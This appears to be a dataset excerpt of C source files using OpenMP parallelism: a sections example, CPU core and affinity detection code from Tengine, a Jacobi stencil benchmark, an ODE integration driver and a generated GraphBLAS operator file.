source stringlengths 3 92 | c stringlengths 26 2.25M |
|---|---|
ex_sections_par.c | /******************************************************************************
* FILE: omp_workshare2.c
* DESCRIPTION:
* OpenMP Example - Sections Work-sharing - C Version
* In this example, the OpenMP SECTION directive is used to assign
* different array operations to each thread that executes a SECTION.
* AUTHOR: Blaise Barney 5/99
* LAST REVISED: 07/16/07
******************************************************************************/
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#define N 100000000
float a[N], b[N], c[N], d[N];
int main (int argc, char *argv[])
{
int i;
double t1,t2;
/* Some initializations */
for (i = 0; i < N; i++) {
a[i] = i * 1.5;
b[i] = i + 22.35;
c[i] = d[i] = 0.0;
}
t1 = omp_get_wtime();
#pragma omp parallel shared (a, b, c, d) private(i)
{
#pragma omp sections nowait
{
#pragma omp section
for (i = 0; i < N; i++) {
c[i] = sin(a[i] + b[i]);
}
#pragma omp section
for (i = 0; i < N; i++) {
d[i] = sqrt(a[i] * b[i]);
}
}
}
t2 = omp_get_wtime();
printf("Duration %g\n",t2-t1);
return 0;
}
|
cpu.c | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* License); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* AS IS BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Parts of the following code in this file refs to
* https://github.com/Tencent/ncnn/blob/master/src/cpu.cpp
* Tencent is pleased to support the open source community by making ncnn
* available.
*
* Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
*
* Licensed under the BSD 3-Clause License (the "License"); you may not use this
* file except in compliance with the License. You may obtain a copy of the
* License at
*
* https://opensource.org/licenses/BSD-3-Clause
*/
/*
* Copyright (c) 2021, OPEN AI LAB
* Author: lswang@openailab.com
*/
#include "cpu.h"
#include "api/c_api.h"
#include <stdio.h>
#include <string.h>
#include <limits.h>
#include <stdint.h>
#ifndef _MSC_VER
#include <pthread.h>
#include <sys/syscall.h>
#include <sched.h>
#include <unistd.h>
#endif
#if __APPLE__
#include "TargetConditionals.h"
#if TARGET_OS_IPHONE
#include <sys/types.h>
#include <sys/sysctl.h>
#include <mach/machine.h>
#define __APPLE_IOS__ 1
#endif
#endif
#ifdef _OPENMP
#include <omp.h>
#endif
static size_t core_count = 0;
static size_t affinity_mask_all_cluster = 0;
static size_t affinity_mask_big_cluster = 0;
static size_t affinity_mask_medium_cluster = 0;
static size_t affinity_mask_little_cluster = 0;
int init_cpu_count()
{
if (0 < core_count)
return core_count;
#ifdef __ANDROID__
{
FILE* cpu_info = fopen("/proc/cpuinfo", "rb");
if (!cpu_info)
return -1;
char buffer[1024];
while (!feof(cpu_info))
{
char* s = fgets(buffer, 1024, cpu_info);
if (!s)
break;
if (memcmp(buffer, "processor", 9) == 0)
core_count++;
}
fclose(cpu_info);
};
#elif __APPLE_IOS__
{
size_t len = sizeof(core_count);
sysctlbyname("hw.ncpu", &core_count, &len, NULL, 0);
};
#else
{
#ifdef _OPENMP
core_count = omp_get_max_threads();
#else
core_count = 1;
#endif
}
#endif
// check count range
if (core_count < 1)
core_count = 1;
// TODO: deal with this conditions
if (core_count > sizeof(size_t) * 8)
core_count = sizeof(size_t) * 8;
return core_count;
}
#ifndef _MSC_VER
static int get_max_freq_khz(int cpuid)
{
// first try, for all possible cpu
char path[256];
sprintf(path, "/sys/devices/system/cpu/cpufreq/stats/cpu%d/time_in_state", cpuid);
FILE* fp = fopen(path, "rb");
if (!fp)
{
// second try, for online cpu
sprintf(path, "/sys/devices/system/cpu/cpu%d/cpufreq/stats/time_in_state", cpuid);
fp = fopen(path, "rb");
if (fp)
{
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1)
break;
if (freq_khz > max_freq_khz)
max_freq_khz = freq_khz;
}
fclose(fp);
if (max_freq_khz != 0)
return max_freq_khz;
fp = NULL;
}
if (!fp)
{
// third try, for online cpu
sprintf(path, "/sys/devices/system/cpu/cpu%d/cpufreq/cpuinfo_max_freq", cpuid);
fp = fopen(path, "rb");
if (!fp)
return -1;
int max_freq_khz = -1;
int ret = fscanf(fp, "%d", &max_freq_khz);
fclose(fp);
if (max_freq_khz <=0 && EOF == ret)
return -1;
else
return max_freq_khz;
}
}
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1)
break;
if (freq_khz > max_freq_khz)
max_freq_khz = freq_khz;
}
fclose(fp);
return max_freq_khz;
}
static int set_sched_affinity(size_t thread_affinity_mask)
{
// cpu_set_t definition
// ref http://stackoverflow.com/questions/16319725/android-set-thread-affinity
#ifndef CPU_SETSIZE
#define CPU_SETSIZE 1024
#endif
#ifndef __NCPUBITS
#define __NCPUBITS (8 * sizeof (unsigned long))
#endif
typedef struct
{
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;
#define CPU_SET(cpu, cpusetp) ((cpusetp)->__bits[(cpu) / __NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
#define CPU_ZERO(cpusetp) memset((cpusetp), 0, sizeof(cpu_set_t))
// set affinity for threads
#if (defined __GLIBC__) || (defined _OHOS_) || (defined V831)
pid_t pid = syscall(SYS_gettid);
#else
#ifdef PI3
pid_t pid = getpid();
#else
#ifdef __APPLE__
uint64_t tid64;
pthread_threadid_np(NULL, &tid64);
pid_t pid = (pid_t)tid64;
#else
pid_t pid = gettid();
#endif
#endif
#endif
cpu_set_t mask;
CPU_ZERO(&mask);
// for (int i = 0; i < ( int )sizeof(size_t) * 8; i++)
for (int i = 0; i < core_count; i++)
{
if (thread_affinity_mask & (1 << i))
CPU_SET(i, &mask);
}
#if __APPLE__
int syscallret = syscall(set_sched_affinity, pid, sizeof(mask), &mask);
#else
int syscallret = syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
#endif
if (syscallret)
{
fprintf(stderr, "syscall error %d\n", syscallret);
return -1;
}
return 0;
}
#endif
int init_cluster_mask()
{
init_cpu_count();
if (0 != affinity_mask_all_cluster)
return 0;
affinity_mask_all_cluster = ((size_t)(1) << core_count) - (size_t)(1);
//affinity_mask_all_cluster = (size_t)(0) - (size_t)(1);
#ifndef _MSC_VER
int max_freq_min_val = INT_MAX;
int max_freq_max_val = 0;
// TODO: deal with very large count of cores
int max_freq_array[sizeof(size_t) * 8];
for (int i = 0; i < core_count; i++)
{
int max_freq_khz = get_max_freq_khz(i);
// fprintf(stderr, "cpu %d, max_freq_khz %d\n", i, max_freq_khz);
max_freq_array[i] = max_freq_khz;
if (max_freq_khz > max_freq_max_val)
max_freq_max_val = max_freq_khz;
if (max_freq_khz < max_freq_min_val)
max_freq_min_val = max_freq_khz;
}
if (max_freq_max_val == max_freq_min_val)
{
affinity_mask_big_cluster = affinity_mask_all_cluster;
affinity_mask_medium_cluster = 0;
affinity_mask_little_cluster = 0;
}
else
{
for (int i = 0; i < core_count; i++)
{
if (max_freq_array[i] == max_freq_max_val)
affinity_mask_big_cluster |= (1 << i);
else if (max_freq_array[i] == max_freq_min_val)
affinity_mask_little_cluster |= (1 << i);
else
affinity_mask_medium_cluster |= (1 << i);
}
}
#else
// TODO implement me for other platforms
affinity_mask_big_cluster = affinity_mask_all_cluster;
#endif
return 0;
}
int check_cpu()
{
init_cpu_count();
init_cluster_mask();
return 0;
}
int get_cpu_mask_count(size_t mask)
{
int count = 0;
for (int i = 0; i < core_count; i++)
if (mask & (1 << i))
count++;
return count;
}
int set_cpu_affine(size_t mask)
{
#if defined __ANDROID__ || defined __linux__
int count = get_cpu_mask_count(mask);
#ifdef _OPENMP
// set affinity for each threads
omp_set_num_threads(count);
int status[sizeof(size_t) * 8] = {0};
#pragma omp parallel for num_threads(count)
for (int i = 0; i < count; i++)
{
status[i] = set_sched_affinity(mask);
}
for (int i = 0; i < count; i++)
{
if (status[i] != 0)
return -1;
}
#else
int status = set_sched_affinity(mask);
if (0 != status)
return -1;
#endif
#elif __APPLE_IOS__ || _MSC_VER
// threads affinity not supported on ios
( void )mask;
return -1;
#else
int status = set_sched_affinity(mask);
if (0 != status) return -1;
return 0;
#endif
}
size_t get_cpu_cluster_mask(int cluster)
{
switch (cluster)
{
case TENGINE_CLUSTER_BIG:
if (0 != affinity_mask_big_cluster)
return affinity_mask_big_cluster;
break;
case TENGINE_CLUSTER_MEDIUM:
if (0 != affinity_mask_medium_cluster)
return affinity_mask_medium_cluster;
break;
case TENGINE_CLUSTER_LITTLE:
if (0 != affinity_mask_little_cluster)
return affinity_mask_little_cluster;
break;
default:
break;
}
return affinity_mask_all_cluster;
}
|
OMP-Jacobi-2D-Naive-Parallel.test.c | #include <stdio.h>
#include <omp.h>
#include <time.h>
#include <stdlib.h>
//#include <unistd.h>
#include <getopt.h>
#include <stdbool.h>
#include <ctype.h>
#include <math.h>
#include <assert.h>
#include <stdbool.h>
#include <ctype.h>
bool initialized;
int globalSeed;
int cores;
int FP_OPS_PER_ITERATION; // just used for outputting approximate MFLOPS
int problemSize;
int T;
int lowerBound;
int upperBound;
double** space[2];
bool initialized = false;
int globalSeed = -1;
int cores = -1;
int FP_OPS_PER_ITERATION = 5;
int problemSize = -1, T = -1, lowerBound = -1, upperBound = -1;
double** space[2] = { NULL, NULL }; // space[t][x][y] for (t,x) in { {0,1} X {lowerBound, ... , upperBound} X {lowerBound, ..., upperBound} };
void init(){
// if init has not already been called (preserve things like global seed.
if( ! initialized ){
// note the convention someVar = ( someVar == -1 )? defaultValue : someVar ;
// this allows us to use the cmd line flags to set variables, AND have an init call.
// all values are initialized with -1 in global space, so if someVar == -1, then it has
// not been set, and and be given a default value.
// seed for random number generator.
// allows all initSpace calls to generate the same inital values
globalSeed = (globalSeed== -1)? time(NULL) : globalSeed;
// problemSpace parameters
T = (T == -1)? 100 : T;
problemSize = (problemSize == -1)? 100 : problemSize;
lowerBound = 1;
upperBound = lowerBound + problemSize - 1;
cores = (cores == -1)? omp_get_num_procs() : cores ;
omp_set_num_threads( cores );
// set initialization flag
initialized = true;
}
}
// initialize space array
void initSpace(){
int i;
// if space has been previously allocated, free up space.
if( space[0] != NULL ){
free( space[0] );
space[0] = NULL;
}
if( space[1] != NULL ){
free( space[1] );
space[1] = NULL;
}
/*
// allocate time steps 0 and 1
space = (double***) malloc( 2 * sizeof(double**) );
if( space == NULL ){
printf( "Could not allocate time steps of space array\n" );
exit(0);
}
*/
// allocate x axis
space[0] = (double**) malloc( (problemSize + 2) * sizeof(double*));
space[1] = (double**) malloc( (problemSize + 2) * sizeof(double*));
if( space[0] == NULL || space[1] == NULL ){
printf( "Could not allocate x axis of space array\n" );
exit(0);
}
// allocate y axis
for( i = 0; i < problemSize + 2; ++i ){
space[0][i] = (double*) malloc( (problemSize + 2) * sizeof(double));
space[1][i] = (double*) malloc( (problemSize + 2) * sizeof(double));
if( space[0][i] == NULL || space[1][i] == NULL ){
printf( "Could not allocate y axis of space array\n" );
exit(0);
}
}
// use global seed to seed the random number gen (will be constant)
srand(globalSeed);
// seed the space.
int x, y;
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
space[0][x][y] = rand() / (double)rand();
}
}
// set halo values (sanity)
for( i = 0; i < problemSize + 2; ++i){
space[0][i][0] = 0;
space[1][i][0] = 0;
space[0][i][problemSize + 1] = 0;
space[1][i][problemSize + 1] = 0;
space[0][0][i] = 0;
space[1][0][i] = 0;
space[0][problemSize + 1][i] = 0;
space[1][problemSize + 1][i] = 0;
}
}
// stencil call.
void stencil( int read, int write, int x, int y ){
// stencil operation
space[write][x][y] = ( space[read][x-1][y] + space[read][x][y] + space[read][x+1][y] + space[read][x][y+1] + space[read][x][y-1] )/5;
}
// parse int abstraction from strtol
int parseInt( char* string ){
return (int) strtol( string, NULL, 10 );
}
// returns true if valid result
bool verifyResult( bool verbose ){
assert( space[0] != NULL && space[1] != NULL );
double** endSpace;
endSpace = (double**) malloc( (problemSize + 2) * sizeof(double*));
if( endSpace == NULL ){
printf( "Could not allocate x axis of verification array\n" );
exit(0);
}
// allocate y axis
for( int x = 0; x < problemSize + 2; ++x ){
endSpace[x] = (double*) malloc( (problemSize + 2) * sizeof(double));
if( endSpace[x] == NULL ){
printf( "Could not allocate y axis of verification array\n" );
exit(0);
}
}
for( int x = 0; x < problemSize + 2; ++x ){
for( int y = lowerBound; y <= upperBound; ++y ){
endSpace[x][y] = space[ T & 1 ][x][y];
}
}
initSpace();
int t, x, y, read = 0, write = 1;
for( t = 1; t <= T; ++t ){
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
stencil( read, write, x, y);
}
}
read = write;
write = 1 - write;
}
bool failed = false;
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
if( endSpace[x][y] != space[ T & 1 ][x][y] ){
failed = true;
if( verbose ) printf( "FAILED\n"); //! %f != %f at %d, %d\n", endSpace[x][y],space[ T & 1 ][x][y], x, y);
break;
}
}
if( failed ) break;
}
if( verbose && !failed ) printf( "SUCCESS\n" );
for( int x = 0; x < problemSize + 2; ++x ){
free( endSpace[x] );
}
free( endSpace );
return !failed;
}
#define STENCIL(read,write,x,y) space[write][x][y] = ( space[read][x-1][y] + space[read][x][y] + space[read][x+1][y] + space[read][x][y+1] + space[read][x][y-1] )/5
// naive parallel iteration test suite
double test_1(){
int t, x, y, read = 0, write = 1;
double start_time = omp_get_wtime();
for( t = 1; t <= T; ++t ){
{
#pragma omp parallel for private( x, y ) schedule(dynamic)
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
STENCIL( read, write, x, y);
}
}
}
read = write;
write = 1 - write;
}
double end_time = omp_get_wtime();
return (end_time - start_time);
}
int main( int argc, char* argv[] ){
setbuf(stdout, NULL); // set buffer to null, so prints ALWAYS print (for debug purposes mainly)
bool verify = false;
bool printtime = true;
// Command line parsing
char c;
while ((c = getopt (argc, argv, "nc:s:p:T:hv")) != -1){
switch( c ) {
case 'n': // print time
printtime = false;
break;
case 'c': // cores
cores = parseInt( optarg );
if( cores <= 0 ){
fprintf(stderr, "cores must be greater than 0: %d\n", cores);
exit( 0 );
}
break;
case 'p': // problem size
problemSize = parseInt( optarg );
if( problemSize <= 0 ){
fprintf(stderr, "problemSize must be greater than 0: %d\n", problemSize);
exit( 0 );
}
break;
case 'T': // T (time steps)
T = parseInt( optarg );
if( T <= 0 ){
fprintf(stderr, "T must be greater than 0: %d\n", T);
exit( 0 );
}
break;
case 'h': // help
printf("usage: %s\n-n \t dont print time \n-p <problem size> \t problem size in elements \n-T <time steps>\t number of time steps\n-c <cores>\tnumber of threads\n-h\tthis dialogue\n-v\tverify output\n", argv[0]);
exit(0);
case 'v': // verify;
verify = true;
break;
case '?':
if (optopt == 'p')
fprintf (stderr, "Option -%c requires positive int argument: problem size.\n", optopt);
else if (optopt == 'T')
fprintf (stderr, "Option -%c requires positive int argument: T.\n", optopt);
else if (optopt == 's')
fprintf (stderr, "Option -%c requires int argument: subset_s.\n", optopt);
else if (optopt == 'c')
fprintf (stderr, "Option -%c requires int argument: number of cores.\n", optopt);
else if (isprint (optopt))
fprintf (stderr, "Unknown option `-%c'.\n", optopt);
else
fprintf(stderr, "Unknown option character `\\x%x'.\n", optopt);
exit(0);
default:
exit(0);
}
}
init();
initSpace();
double time = test_1();
if( printtime ){
printf( "Time: %f\n", time );
}
if( verify ){
verifyResult( true );
}
}
|
solver_generic.c | /**
* \file
* \brief the generic integration driver for the CPU solvers
*
* \author Nicholas Curtis
* \date 03/10/2015
*
*/
#include "header.h"
#include "solver.h"
#ifdef GENERATE_DOCS
namespace generic {
#endif
/**
* \brief Integration driver for the CPU integrators
* \param[in] NUM The (non-padded) number of IVPs to integrate
* \param[in] t The current system time
* \param[in] t_end The IVP integration end time
* \param[in] pr_global The system constant variable (pressures / densities)
* \param[in,out] y_global The system state vectors at time t.
Returns system state vectors at time t_end
*
* This is generic driver for CPU integrators
*/
void intDriver (const int NUM, const double t, const double t_end,
const double *pr_global, double *y_global)
{
int tid;
#pragma omp parallel for shared(y_global, pr_global) private(tid)
for (tid = 0; tid < NUM; ++tid) {
// local array with initial values
double y_local[NSP];
double pr_local = pr_global[tid];
// load local array with initial values from global array
for (int i = 0; i < NSP; i++)
{
y_local[i] = y_global[tid + i * NUM];
}
// call integrator for one time step
check_error(tid, integrate (t, t_end, pr_local, y_local));
// update global array with integrated values
for (int i = 0; i < NSP; i++)
{
y_global[tid + i * NUM] = y_local[i];
}
} //end tid loop
} // end intDriver
#ifdef GENERATE_DOCS
}
#endif |
GB_binop__first_int8.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_08__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_02__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_04__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__first_int8)
// A*D function (colscale): GB (_AxD__first_int8)
// D*A function (rowscale): GB (_DxB__first_int8)
// C+=B function (dense accum): GB (_Cdense_accumB__first_int8)
// C+=b function (dense accum): GB (_Cdense_accumb__first_int8)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__first_int8)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: int8_t
// A type: int8_t
// B,b type: int8_t
// BinaryOp: cij = aij
#define GB_ATYPE \
int8_t
#define GB_BTYPE \
int8_t
#define GB_CTYPE \
int8_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
int8_t aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
;
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
int8_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = x ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_FIRST || GxB_NO_INT8 || GxB_NO_FIRST_INT8)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__first_int8)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__first_int8)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
#include "GB_dense_subassign_23_template.c"
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__first_int8)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
// get the scalar b for C += b, of type int8_t
int8_t bwork = (*((int8_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__first_int8)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__first_int8)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__first_int8)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__first_int8)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__first_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__first_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__first_int8)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *Cx = (int8_t *) Cx_output ;
int8_t x = (*((int8_t *) x_input)) ;
int8_t *Bx = (int8_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
; ;
Cx [p] = x ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
int8_t *Cx = (int8_t *) Cx_output ;
int8_t *Ax = (int8_t *) Ax_input ;
int8_t y = (*((int8_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
int8_t aij = GBX (Ax, p, false) ;
Cx [p] = aij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = x ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t x = (*((const int8_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
int8_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t y = (*((const int8_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
uniform_grid_environment.h | // -----------------------------------------------------------------------------
//
